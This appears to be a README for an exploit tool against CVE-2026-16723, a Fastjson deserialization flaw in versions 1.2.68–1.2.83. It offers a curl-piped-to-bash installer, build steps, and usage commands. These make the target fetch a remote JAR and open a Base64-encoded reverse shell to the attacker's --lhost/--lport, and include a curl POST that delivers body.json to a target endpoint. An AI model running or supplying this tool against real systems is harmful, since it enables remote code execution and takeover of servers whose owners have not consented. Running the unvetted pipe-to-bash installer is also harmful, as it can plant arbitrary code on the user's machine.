
CVE-2026-16723 — Updated!
A critical vulnerability affecting Fastjson versions 1.2.68 – 1.2.83.
CVE-2026-16723 Exploit
A standalone C++17 implementation for CVE-2026-16723, a critical vulnerability affecting Fastjson versions 1.2.68 – 1.2.83.
Requirements
-
Linux (or WSL on Windows)
-
C++17 compatible compiler (GCC 7+ or Clang 5+)
-
CMake 3.10 or newer
-
System packages:
libzip-devzlib1g-dev
Debian / Ubuntu
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev
Installation
Quick Install (Recommended)
Install everything with a single command:
curl -sSL https://raw.githubusercontent.com/1xPwn/CVE-2026-16723/main/install.sh | bash
Or download and execute the installer manually:
wget https://raw.githubusercontent.com/1xPwn/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh
The installation script will:
-
Install all required system packages.
-
Download the required header-only libraries:
nlohmann/jsoncpp-httplib
-
Build the project.
-
Place the compiled binary in the current directory as:
./exploit
Manual Build
If you cloned the repository:
git clone https://github.com/1xPwn/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh
Or build manually:
mkdir build
cd build
cmake ..
make -j$(nproc)
cp exploit ../
Usage
Run the binary:
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]
Example
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000
After execution the following files will be created:
x
body.json
The HTTP server will start on the configured port (default: 8000) and the tool will wait for an incoming reverse shell connection.
Sending the Payload
Send the generated body.json file to the vulnerable endpoint:
curl -X POST http://<TARGET_IP>:8080/api/products/search \
-H "Content-Type: application/json" \
--data-binary @body.json
If the application expects a different JSON field, specify it using the --field option.
Command-Line Options
| Option | Description | Default |
|---|---|---|
--lhost | Local IP address | Required |
--lport | Reverse shell listening port | 4444 |
--http-port | HTTP server port | 8000 |
--first | First file descriptor to try | 3 |
--last | Last file descriptor to try | 30 |
--field | JSON field name | facets |
--outdir | Output directory | . |
-h, --help | Show help message | — |
Output Files
| File | Description |
|---|---|
x | Generated JAR payload |
body.json | JSON payload to send to the target |
Notes
- This project is intended only for authorized security testing and educational purposes.
- The implementation forces the target application to download and load a remote JAR using the
jar:httpandjar:fileprotocols. - The reverse shell command is Base64-encoded to reduce escaping issues.